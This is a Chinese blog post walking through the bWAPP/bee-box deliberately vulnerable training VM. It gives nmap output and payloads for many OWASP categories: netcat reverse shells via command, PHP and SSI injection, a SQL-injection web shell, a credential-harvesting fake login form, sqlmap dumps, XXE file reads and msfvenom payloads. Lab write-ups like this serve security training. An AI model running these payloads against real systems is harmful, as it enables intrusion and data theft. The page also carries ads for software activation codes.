大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE稳定放心使用
简介
虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
如果你想自己去部署环境:https://sourceforge.net/projects/bwapp/files/bee-box/
bWAPP包含有100多个漏洞,包括OWASP Top10安全风险,很爽的PHPweb靶机。
登录username:bee password:bug 可设置漏洞级别来增加难度低->中->高。
想详细了解去查阅相关文档,让我们愉快的干掉小蜜蜂
0x001 侦查
在怎样也要侦查一下这个虚拟机吧,基本的流程,拿出Nmap扫它一下下
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_ 2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp open ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
666/tcp open doom?
| fingerprint-strings:
| GenericLines, beast2:
| *** bWAPP Movie Service ***
|_ Matching movies: 0
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ VNC Authentication (2)
6001/tcp open X11 (access denied)
8080/tcp open http nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg:
|_ http/1.1
9080/tcp open http lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/4%Time=5C06158B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,400,"\*\*\*\x20bWAPP\x20Movie\x20Service\x20\*\*\*\nMatching\
SF:x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0")%r(beast2,400,"\*\*\*\x20bWAPP\x20Movie\x20Service
SF:\x20\*\*\*\nMatching\x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: bee-box
| NetBIOS computer name:
| Domain name:
| FQDN: bee-box
|_ System time: 2018-11-07T11:27:32+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
有了基本的了解,开始进行漏洞的练习
0x002 A1 注入
1.HTML Injection – Reflected (GET)
查看表单是get还是post打开浏览器 F12 查看,查看源码页面搜First name:,为了方便回放数据,使用burpsuite
<form action="/bWAPP/htmli_get.php" method="GET">
HTML <a>标签的注入 <a href=http://www.baidu.com>点此领取奖励</a>
<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js 窃取cookie 可以展开思路去扩展,条条马路通罗马
当设置中级别的时候注入不了,尝试对代码进行转码处理 ,高级别的还无法绕过,对php不太熟悉
<a href=http://www.baidu.com>点此领取奖励</a>
#进行转码
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E
2.HTML Injection – Reflected (POST)
<a href=http://www.baidu.com>点此领取奖励</a> #low
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium
high 作弊办法只有 改数据了。。。。非常无耻啊啊啊!!!
POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #改1 或 0
Connection: close
Upgrade-Insecure-Requests: 1
firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit
3.HTML Injection – Reflected (URL)
#low 反射URL可以任意修改
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script> HTTP/1.1
Host: 192.168.1.104 #IP地址任意修改
4.HTML Injection – Stored (Blog)
<a href=http://www.baidu.com>点此领取奖励</a> #low 可写入任意的代码进行执行
#伪造登录
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
5.iFrame Injection
#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>
6.LDAP Connection Settings
#没有配置 需要自己配置下
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #安装web页面
clear=* #注入
7.Mail Header Injection (SMTP)
test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com
8.OS Command Injection
#low
; whoami
www.nsa.gov && nc -vn 192.168.1.101 4444 -e /bin/bash
#监听
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#medium
www.nsa.gov | nc -vn 192.168.1.101 4444 -e /bin/bash
high 的时候很难绕过上工具,那么多事 直接搞它
commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"
9.OS Command Injection – Blind
#low
127.0.0.1 && nc -vn 192.168.1.101 4444 -e /bin/bash
#high 直接用commix
10.PHP Code Injection
#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn 192.168.1.101 4444 -e /bin/bash')
#还可以执行wget http://去下载木马 直接getshell 这种方法比瑞士军刀和反弹shell的隐藏性更好
11.Server-Side Includes (SSI) Injection
#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->
#接收
nc -nlvp 4444
12.SQL Injection (GET/Search)
#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #
iron' union select 1,login,password,email,5,6,7 from users #
#可根据得到的密码进行激活成功教程
john --format:raw-sha1 /root/password.txt --show
?:bug
1 password hash cracked, 0 left
iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #
13.SQL Injection (GET/Select)
movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go
14.SQL Injection (POST/Search)
POST 提交参数一样的道理
AJAX 简单理解输入参数立马查询,和getpost注入一样的道理,
AJAX 分同步和异步
’ ‘
1' union select 1,2,3,4,5,6,7#
1' union select 1,login,3,email,password,6,7 from users#
15.SQL Injection – Stored (XML)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
#burp中查看数据
SqlMap:脱库
sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs
available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql
--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database: 'bWAPP'
--current-user
[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user: 'root@localhost'
--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'
--passwords
cracked password 'bug' for user 'root' #直接停了不让它跑了
-D bWAPP --tables
[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog |
| heroes |
| movies |
| users |
| visitors |
+----------+
-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| activated | tinyint(1) |
| activation_code | varchar(100) |
| admin | tinyint(1) |
| email | varchar(100) |
| id | int(10) |
| login | varchar(100) |
| password | varchar(100) |
| reset_code | varchar(100) |
| secret | varchar(100) |
+-----------------+--------------+
-D bWAPP -T users -C password --dump
Database: bWAPP
Table: users
[2 entries]
+------------------------------------------------+
| password |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+
--dump-all #直接脱库
#本地激活成功教程密码太耗费时间了,可以放到服务器让它去跑。
0x003. A2 – Broken Auth. & Session Mgmt
1.Broken Auth. – CAPTCHA Bypassing
#使用burp Intruder 进行暴力激活成功教程
login=§test§&password=§123456§&captcha_user=zq9mso&form=submit
2.Broken Auth. – Forgotten Function
email=§12312414%40163.com§&action=forgot #撞
3.Session Mgmt. – Administrative Portals
admin=1
4.Session Mgmt. – Cookies (Secure)
security_level=0; top_security=no<script>alert(1)</script>
Connection: close
5.Session Mgmt. – Session ID in URL
smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c
0x004. A3 – Cross-Site Scripting (XSS)
1.XSS – Reflected (GET) (POST)
<script>alert(document.cookie)</script>
2.XSS – Reflected (JSON)
<svg onload=prompt(0)>
3.XSS – Reflected (AJAX/JSON)
<img src=1 onerror=alert(1) />
4.XSS – Reflected (Back Button)
Referer: ';alert(1);'
5.XSS – Reflected (Custom Header)
bWAPP: <script>alert(1)</script>
6.XSS – Reflected (Eval)
date=alert(1)
7.XSS – Reflected (HREF)
Referer: <script>alert(1)</script>
8.XSS – Reflected (User-Agent)
User-Agent: <script>alert(1)</script>
0x005. A4 – Insecure Direct Object References
1.Insecure DOR (Change Secret)
secret=1&login=test&action=change
2.Insecure DOR (Reset Secret)
<reset><login>bee</login><secret>Any bugs?</secret></reset> #任意修改
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
3.Insecure DOR (Order Tickets)
ticket_quantity=1&ticket_price=15&action=order #修改隐藏字段
#很多对价格没有进行模糊处理的BUG,即便是进行模糊处理,还可以复制小数进行测试
0x006. A5 – Security Misconfiguration
1.Arbitrary File Access (Samba)
msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.1.101:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...
id
uid=0(root) gid=0(root) groups=0(root)
使用enum4linux 进行枚举
#详细用法https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #可以直接后面加IP进行详细的信息收集
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec 7 17:43:26 2018
==========================
| Target Information |
==========================
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.104 |
=====================================================
[+] Got domain/workgroup name: ITSECGAMES
======================================
| Session Check on 192.168.1.104 |
======================================
[+] Server 192.168.1.104 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.104 |
============================================
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==========================================
| Share Enumeration on 192.168.1.104 |
==========================================
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (bee-box server (Samba 3.0.28a))
opt Disk
tmp Disk oh noes!
print$ Disk Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer Xerox Phaser 8500DN PS
Snagit_9:6 Printer Snagit 9
Send_To_OneNote_2010:8 Printer Send To OneNote 2010
PDF Printer PDF
Microsoft_XPS_Document_Writer:1 Printer Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer Fax - HP Officejet 6500 E710a-f (Network)
Fax:2 Printer Fax
CutePDF_Writer:3 Printer CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
ITSECGAMES BEE-BOX
WORKGROUP FREE
[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$ [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp Mapping: OK, Listing: OK
//192.168.1.104/print$ Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7 Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6 Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8 Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1 Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5 Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2 Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3 Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec 7 17:43:27 2018
smbclient -L 192.168.1.104
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (bee-box server (Samba 3.0.28a))
opt Disk
tmp Disk oh noes!
print$ Disk Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer Xerox Phaser 8500DN PS
Snagit_9:6 Printer Snagit 9
Send_To_OneNote_2010:8 Printer Send To OneNote 2010
PDF Printer PDF
Microsoft_XPS_Document_Writer:1 Printer Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer Fax - HP Officejet 6500 E710a-f (Network)
Fax:2 Printer Fax
CutePDF_Writer:3 Printer CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
ITSECGAMES BEE-BOX
上传文件
smbclient \\\\192.168.1.104\\tmp -c "put test"
0x007
1.HTML5 Web Storage (Secret)
if(typeof(Storage) !== "undefined")
{
localStorage.login = "bee";
localStorage.secret = "1";
alert(localStorage.login);
alert(localStorage.secret);
}
2.Directory Traversal – Directories
?directory=../../../../var/www/
3.Directory Traversal – Files
?page=../../../../../etc/passwd
4.Host Header Attack (Cache Poisoning)
GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com
5.Remote & Local File Inclusion (RFI/LFI)
?language=../../../../etc/passwd&action=go
?language=http://www.baidu.com
6.Restrict Device Access
Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7
7.XML External Entity Attacks (XXE)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>
8.CSRF (Change Password)
?password_new=123&password_conf=123&action=change
9.PHP Eval Function
php_eval.php?eval=echo shell_exec("cat /etc/passwd");
10.Unrestricted File Upload
#low
weevely generate 123456 shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php
#high
Remote & Local File Inclusion (RFI/LFI)
rlfi.php?language=images/shelltmp.php.png
总结:
只对此靶机进行了黑盒测试,没对源码分析。对php这门语言没有过多的学习,还是比较懒散。运用了kali linux工具进行渗透,工具的扫描会出现误报情况和诸多漏洞扫描不出来。工具只是辅助作用,还需要进行手工重复确认,对原理知识还需进一步学习练习。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/190140.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...